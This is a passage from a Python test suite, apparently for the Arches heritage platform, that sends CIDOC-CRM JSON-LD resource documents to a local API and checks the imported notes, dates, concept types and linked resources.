self.assertTrue(js[pts] == 12)
def test_2b_complex_multiple(self):
data = """
{
"@id": "http://localhost:8000/resources/5e9baff0-109b-11ea-957a-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P101_had_as_general_use": {
"@id": "http://localhost:8000/concepts/fb457e76-e018-41e7-9be3-0f986816450a",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://localhost:8000/concepts/dcd28b8a-0840-4a7f-a0d6-0341438552e6",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Meta Type B"
},
"http://www.w3.org/2000/01/rdf-schema#label": "Test Type A"
},
"http://www.cidoc-crm.org/cidoc-crm/P160_has_temporal_projection": [
{
"@id": "http://localhost:8000/tile/7e0371da-c62f-46c1-899b-d1e9419a76d5/node/127193ea-fa6d-11e9-b369-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P79_beginning_is_qualified_by": "example 2"
},
{
"@id": "http://localhost:8000/tile/8cc347a4-265d-4a06-8327-e198e1d1d0c5/node/127193ea-fa6d-11e9-b369-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P79_beginning_is_qualified_by": "example",
"http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "1903-10-28"
}
},
{
"@id": "http://localhost:8000/tile/6011c512-47e9-46c3-b6f3-034dcc6f2a9d/node/127193ea-fa6d-11e9-b369-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "2019-11-15"
}
},
{
"@id": "http://localhost:8000/tile/7d42af30-4d00-434f-95d4-7a3b3f9bfec8/node/127193ea-fa6d-11e9-b369-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P79_beginning_is_qualified_by": "example"
}
],
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://localhost:8000/concepts/6bac5802-a6f8-427c-ba5f-d4b30d5b070e",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Single Type A"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": [
"asdfasdfa",
"1903-10-21"
],
"http://www.cidoc-crm.org/cidoc-crm/P45_consists_of": {
"@id": "http://localhost:8000/concepts/36c8d7a3-32e7-49e4-bd4c-2169a06b240a",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E57_Material",
"http://www.w3.org/2000/01/rdf-schema#label": "material a"
},
"http://www.cidoc-crm.org/cidoc-crm/P57_has_number_of_parts": [
2,
1
]
}
"""
url = self._create_url(
graph_id="ee72fb1e-fa6c-11e9-b369-3af9d3b32b71",
resource_id="5e9baff0-109b-11ea-957a-acde48001122",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/5e9baff0-109b-11ea-957a-acde48001122")
pts = "http://www.cidoc-crm.org/cidoc-crm/P57_has_number_of_parts"
note = "http://www.cidoc-crm.org/cidoc-crm/P3_has_note"
temp = "http://www.cidoc-crm.org/cidoc-crm/P160_has_temporal_projection"
qual = "http://www.cidoc-crm.org/cidoc-crm/P79_beginning_is_qualified_by"
botb = "http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin"
self.assertTrue(pts in js)
self.assertTrue(set(js[pts]) == set([1, 2]))
self.assertTrue(note in js)
self.assertTrue(set(js[note]) == set(["asdfasdfa", "1903-10-21"]))
self.assertTrue(temp in js)
temps = js[temp]
self.assertTrue(len(temps) == 4)
for t in temps:
if qual in t:
self.assertTrue(t[qual] in ["example", "example 2"])
if botb in t:
self.assertTrue(t[botb]["@value"] in ["2019-11-15", "1903-10-28"])
def test_3_5098_concepts(self):
data = """
{
"@id": "http://localhost:8000/resources/0b4439a8-beca-11e9-b4dc-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E21_Person",
"http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by": {
"@id": "http://localhost:8000/tile/cad329aa-1802-416e-bbce-5f71e21b1a47/node/accb030c-bec9-11e9-b4dc-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": [
{
"@id": "http://localhost:8000/concepts/c3c4b8a8-39bb-41e7-af45-3a0c60fa4ddf",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Concept 2"
},
{
"@id": "http://localhost:8000/concepts/0bb450bc-8fe3-46cb-968e-2b56849e6e96",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Concept 1"
}
]
}
}
"""
url = self._create_url(
graph_id="92ccf5aa-bec9-11e9-bd39-0242ac160002",
resource_id="0b4439a8-beca-11e9-b4dc-0242ac160002",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
print(f"Got JSON for test 3: {js}")
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/0b4439a8-beca-11e9-b4dc-0242ac160002")
types = js["http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by"]["http://www.cidoc-crm.org/cidoc-crm/P2_has_type"]
self.assertTrue(type(types) == list)
self.assertTrue(len(types) == 2)
cids = [
"http://localhost:8000/concepts/c3c4b8a8-39bb-41e7-af45-3a0c60fa4ddf",
"http://localhost:8000/concepts/0bb450bc-8fe3-46cb-968e-2b56849e6e96",
]
self.assertTrue(types[0]["@id"] in cids)
self.assertTrue(types[1]["@id"] in cids)
self.assertTrue(types[0]["@id"] != types[1]["@id"])
def test_4_5098_resinst(self):
# Make instances for this new one to reference
BusinessDataImporter("tests/fixtures/jsonld_base/data/test_2_instances.json").import_business_data()
data = """
{
"@id": "http://localhost:8000/resources/abcd1234-1234-1129-b6e7-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P130_shows_features_of": [
{
"@id": "http://localhost:8000/resources/12bbf5bc-fa85-11e9-91b8-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object"
},
{
"@id": "http://localhost:8000/resources/24d0d25a-fa75-11e9-b369-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object"
}
],
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "res inst list import"
}
"""
url = self._create_url(
graph_id="ee72fb1e-fa6c-11e9-b369-3af9d3b32b71",
resource_id="abcd1234-1234-1129-b6e7-3af9d3b32b71",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"Test 4: {response.content}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
# print(f"Got json for test 4: {js}")
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/abcd1234-1234-1129-b6e7-3af9d3b32b71")
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P130_shows_features_of" in js)
feats = js["http://www.cidoc-crm.org/cidoc-crm/P130_shows_features_of"]
self.assertTrue(type(feats) == list)
self.assertTrue(len(feats) == 2)
rids = [
"http://localhost:8000/resources/12bbf5bc-fa85-11e9-91b8-3af9d3b32b71",
"http://localhost:8000/resources/24d0d25a-fa75-11e9-b369-3af9d3b32b71",
]
self.assertTrue(feats[0]["@id"] in rids)
self.assertTrue(feats[1]["@id"] in rids)
# test that the default ontologyProperties and inverseOntologyProperties are used
tiles = TileModel.objects.filter(resourceinstance_id="abcd1234-1234-1129-b6e7-3af9d3b32b71")
for tile in tiles:
if "ae93f844-fa6d-11e9-b369-3af9d3b32b71" in tile.data:
self.assertEqual(
tile.data["ae93f844-fa6d-11e9-b369-3af9d3b32b71"][0]["ontologyProperty"],
"http://www.cidoc-crm.org/cidoc-crm/P62_depicts",
)
self.assertEqual(
tile.data["ae93f844-fa6d-11e9-b369-3af9d3b32b71"][0]["inverseOntologyProperty"],
"http://www.cidoc-crm.org/cidoc-crm/P62i_is_depicted_by",
)
def test_5_5098_resinst_branch(self):
# 2019-11-01 - Conversely this fails, as it is in a branch
BusinessDataImporter("tests/fixtures/jsonld_base/data/test_2_instances.json").import_business_data()
data = """
{
"@id": "http://localhost:8000/resources/7fffffff-faa1-11e9-84de-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by": {
"@id": "http://localhost:8000/tile/a4896405-5c73-49f4-abd3-651911e82fde/node/51c3ede8-faa1-11e9-84de-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P128i_is_carried_by": [
{
"@id": "http://localhost:8000/resources/24d0d25a-fa75-11e9-b369-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object"
},
{
"@id": "http://localhost:8000/resources/12bbf5bc-fa85-11e9-91b8-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object"
}
]
}
}
"""
# Load up the models and data only once
with open(os.path.join("tests/fixtures/jsonld_base/models/5098_b_resinst.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
url = self._create_url(
graph_id="40dbcffa-faa1-11e9-84de-3af9d3b32b71",
resource_id="7fffffff-faa1-11e9-84de-3af9d3b32b71",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
print(f"Got json for test 5: {js}")
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/7fffffff-faa1-11e9-84de-3af9d3b32b71")
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by" in js)
feats = js["http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by"]["http://www.cidoc-crm.org/cidoc-crm/P128i_is_carried_by"]
self.assertTrue(type(feats) == list)
self.assertTrue(len(feats) == 2)
def test_6_5126_collection_filter(self):
# 2019-11-01 - Fails due to #5126, the concept is not checked against the collection
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5126-thesaurus.xml")
ret = skos.save_concepts_from_skos(rdf)
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5126-collections.xml")
ret = skos.save_concepts_from_skos(rdf)
# Load up the models and data only once
with open(os.path.join("tests/fixtures/jsonld_base/models/5126_collection_ambiguity.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
data = """
{
"@id": "http://localhost:8000/resources/69a4af50-c055-11e9-b4dc-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://vocab.getty.edu/aat/300404216",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "aquarelles (paintings)"
}
}
"""
url = self._create_url(
graph_id="09e3dc8a-c055-11e9-b4dc-0242ac160002",
resource_id="69a4af50-c055-11e9-b4dc-0242ac160002",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"Test 6 response: {response.content}")
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
print(f"Got JSON for test 6: {js}")
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/69a4af50-c055-11e9-b4dc-0242ac160002")
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P2_has_type" in js)
typ = js["http://www.cidoc-crm.org/cidoc-crm/P2_has_type"]
self.assertTrue(typ["@id"] == "http://vocab.getty.edu/aat/300404216")
def test_7_5121_branches(self):
# 2019-11-01 - This fails due to #5121, the presence of content is not used to rule out the resource-instance branch
data = """
{
"@id": "http://localhost:8000/resources/87654321-c000-1100-b400-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E21_Person",
"http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by": {
"@id": "http://localhost:8000/tile/17fa1306-d48f-434e-ad37-fc4c9b09d979/node/d1af9e9e-bf96-11e9-b4dc-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://localhost:8000/concepts/0bb450bc-8fe3-46cb-968e-2b56849e6e96",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Concept 1"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "Test Content"
}
}
"""
url = self._create_url(
graph_id="9f716aa2-bf96-11e9-bd39-0242ac160002",
resource_id="87654321-c000-1100-b400-0242ac160002",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"Test 7 response: {response.content}")
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
print(f"Got JSON for test 7: {js}")
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/87654321-c000-1100-b400-0242ac160002")
lo = js["http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by"]
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P3_has_note" in lo)
self.assertTrue(lo["http://www.cidoc-crm.org/cidoc-crm/P3_has_note"] == "Test Content")
def test_7b_5121_branches(self):
# This loads the referenced resource, 2a615f66...001122
BusinessDataImporter("tests/fixtures/jsonld_base/data/test_5121b_reference_instances.json").import_business_data()
# The third node is the resource-instance, as has_note is required in the semantic branch
# So none of the three nodes are ambiguous and should all load at the same time
data = """
{
"@id": "http://localhost:8000/resources/87654321-c000-1100-b400-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E21_Person",
"http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by": [{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://localhost:8000/concepts/0bb450bc-8fe3-46cb-968e-2b56849e6e96",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Concept 1"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "Test Content"
},
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "No Concept, still unique"
},
{
"@id": "http://localhost:8000/resources/2a615f66-114d-11ea-8de7-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object"
}]
}
"""
url = self._create_url(
graph_id="9f716aa2-bf96-11e9-bd39-0242ac160002",
resource_id="87654321-c000-1100-b400-0242ac160002",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"Test 7b response: {response.content}")
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
rtb = "http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by"
note = "http://www.cidoc-crm.org/cidoc-crm/P3_has_note"
self.assertTrue(rtb in js)
self.assertTrue(len(js[rtb]) == 3)
for r in js[rtb]:
hasnote = note in r
isres = r["@id"].startswith("http://localhost:8000/resources/")
self.assertTrue((hasnote and not isres) or (isres and not hasnote))
self.assertTrue(not (hasnote and isres))
def test_8_4564_resinst_models(self):
with open(os.path.join("tests/fixtures/jsonld_base/models/4564-person.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
with open(os.path.join("tests/fixtures/jsonld_base/models/4564-group.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
with open(os.path.join("tests/fixtures/jsonld_base/models/4564-referenced.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
aux_data = """
{
"@id": "http://localhost:8000/resources/923a5fa8-bfa8-11e9-bd39-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E74_Group",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "Test Group"
}
"""
url = self._create_url(
graph_id="2c03ddcc-bfa8-11e9-b4dc-0242ac160002",
resource_id="923a5fa8-bfa8-11e9-bd39-0242ac160002",
)
response = self.client.put(url, data=aux_data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertTrue(response.status_code == 201)
data = """
{
"@id": "http://localhost:8000/resources/940a2c82-bfa8-11e9-bd39-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P51_has_former_or_current_owner": {
"@id": "http://localhost:8000/resources/923a5fa8-bfa8-11e9-bd39-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E74_Group"
}
}
"""
url = self._create_url(
graph_id="e3d4505e-bfa7-11e9-b4dc-0242ac160002",
resource_id="940a2c82-bfa8-11e9-bd39-0242ac160002",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"Test 8 response: {response.content}")
# this does not currently work
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
print(f"Got JSON for test 8: {js}")
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/940a2c82-bfa8-11e9-bd39-0242ac160002")
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P51_has_former_or_current_owner" in js)
owner = js["http://www.cidoc-crm.org/cidoc-crm/P51_has_former_or_current_owner"]
self.assertTrue(owner["@id"] == "http://localhost:8000/resources/923a5fa8-bfa8-11e9-bd39-0242ac160002")
def test_9_5299_basic(self):
url = self._create_url(
graph_id="0cadd978-071a-11ea-8d9a-acde48001122",
resource_id="faceb004-dead-11e9-bd39-0242ac160002",
)
data = """
{
"@id": "http://localhost:8000/resources/faceb004-dead-11e9-bd39-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P108i_was_produced_by": {
"@id": "http://localhost:8000/tile/1580cf8b-1ead-42b7-a22a-cc92bff0aafb/node/1ae420ba-071a-11ea-8d9a-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "Production"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "#ff00ff"
}
"""
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"Test 9 response: {response.content}")
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
prod = "http://www.cidoc-crm.org/cidoc-crm/P108i_was_produced_by"
note = "http://www.cidoc-crm.org/cidoc-crm/P3_has_note"
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/faceb004-dead-11e9-bd39-0242ac160002")
self.assertTrue(prod in js)
prodjs = js[prod]
self.assertTrue(note in prodjs)
self.assertTrue(prodjs[note] == "Production")
self.assertTrue(note in js)
self.assertTrue(js[note] == "#ff00ff")
def test_a_5299_complex(self):
url = self._create_url(
graph_id="f348bbda-0721-11ea-b628-acde48001122",
resource_id="deadface-0000-11e9-bd39-0242ac160002",
)
data = """
{
"@id": "http://localhost:8000/resources/deadface-0000-11ea-b628-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P108i_was_produced_by": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P10i_contains": [
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E4_Period",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "Import Note"
},
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E4_Period",
"http://www.cidoc-crm.org/cidoc-crm/P4_has_time-span": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "2018-01-01"
}
}
}
]
}
}
"""
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"Test 9 response: {response.content}")
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/deadface-0000-11e9-bd39-0242ac160002")
prod = "http://www.cidoc-crm.org/cidoc-crm/P108i_was_produced_by"
note = "http://www.cidoc-crm.org/cidoc-crm/P3_has_note"
conts = "http://www.cidoc-crm.org/cidoc-crm/P10i_contains"
ts = "http://www.cidoc-crm.org/cidoc-crm/P4_has_time-span"
botb = "http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin"
prodjs = js[prod]
contl = prodjs[conts]
self.assertTrue(len(contl) == 2)
if note in contl[0]:
print(f"note data: {contl[0]}")
self.assertTrue(contl[0][note] == "Import Note")
jsts = contl[1][ts]
else:
print(f"note data: {contl[1]}")
self.assertTrue(contl[1][note] == "Import Note")
jsts = contl[0][ts]
self.assertTrue(jsts[botb]["@value"] == "2018-01-01")
def test_b_5600_concept_label(self):
with open(os.path.join("tests/fixtures/jsonld_base/models/5600-external-label.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
data = """
{
"@id": "http://localhost:8000/resources/61787e78-0e3f-11ea-b4f1-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P1_is_identified_by": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E42_Identifier",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "madonna bla bla",
"http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "sale bla bla"
}
},
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://vocab.getty.edu/aat/300033898",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "History"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "visual work of madonna bla bla"
}
"""
url = self._create_url(
graph_id="9d2c2ca0-0e3d-11ea-b4f1-acde48001122",
resource_id="61787e78-0e3f-11ea-b4f1-acde48001122",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"\n\n\nTest b response: {response.content}")
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/61787e78-0e3f-11ea-b4f1-acde48001122")
def test_c_path_with_array(self):
with open(os.path.join("tests/fixtures/jsonld_base/models/string_to_path_basic.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
data = """
{
"@id": "http://localhost:8000/resources/5683f462-107d-11ea-b7e9-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E21_Person",
"http://www.cidoc-crm.org/cidoc-crm/P1_is_identified_by": [
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E41_Appellation",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "remy pour la russie"
},
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E41_Appellation",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://vocab.getty.edu/aat/300033898",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "History"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "remy"
}
],
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "remy"
}
"""
url = self._create_url(
graph_id="d5456066-107c-11ea-b7e9-acde48001122",
resource_id="5683f462-107d-11ea-b7e9-acde48001122",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"\n\n\nTest c response: {response.content}")
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/5683f462-107d-11ea-b7e9-acde48001122")
idby = "http://www.cidoc-crm.org/cidoc-crm/P1_is_identified_by"
self.assertTrue(idby in js)
self.assertTrue(len(js[idby]) == 2)
def test_d_path_with_array_2(self):
data = """
{
"@id": "http://localhost:8000/resources/10000000-109b-11ea-957a-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P57_has_number_of_parts": [
2,
1
]
}
"""
url = self._create_url(
graph_id="ee72fb1e-fa6c-11e9-b369-3af9d3b32b71",
resource_id="10000000-109b-11ea-957a-acde48001122",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/10000000-109b-11ea-957a-acde48001122")
pts = "http://www.cidoc-crm.org/cidoc-crm/P57_has_number_of_parts"
self.assertTrue(pts in js)
self.assertTrue(set(js[pts]) == set([1, 2]))
def test_e_path_with_array_resinst(self):
# 2019-11-27 - Passing with extra @id checks in rdffile
data = """
{
"@id": "http://localhost:8000/resources/8e870000-114e-11ea-8de7-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E21_Person",
"http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by": [
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "test 1"
},
{
"@id": "http://localhost:8000/resources/2a615f66-114d-11ea-8de7-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object"
}
]
}
"""
url = self._create_url(
graph_id="9f716aa2-bf96-11e9-bd39-0242ac160002",
resource_id="8e870000-114e-11ea-8de7-acde48001122",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/8e870000-114e-11ea-8de7-acde48001122")
rtb = "http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by"
note = "http://www.cidoc-crm.org/cidoc-crm/P3_has_note"
self.assertTrue(rtb in js)
self.assertTrue(len(js[rtb]) == 2)
rtb1 = js[rtb][0]
rtb2 = js[rtb][1]
if note in rtb1:
self.assertTrue(rtb2["@id"].startswith("http://localhost:8000/resources"))
else:
self.assertTrue(rtb1["@id"].startswith("http://localhost:8000/resources"))
def test_f_big_nest_mess(self):
data = """{
"@id": "http://localhost:8000/resources/c3b693cc-1542-11ea-b353-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P108i_was_produced_by": [
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P10_falls_within": [
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P14_carried_out_by": {
"@id": "http://localhost:8000/resources/5e9baff0-109b-11ea-957a-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E21_Person"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "asdf",
"http://www.cidoc-crm.org/cidoc-crm/P4_has_time-span": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "2019-12-03"
},
"http://www.cidoc-crm.org/cidoc-crm/P82b_end_of_the_end": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "2019-12-05"
},
"http://www.cidoc-crm.org/cidoc-crm/P83_had_at_least_duration": {
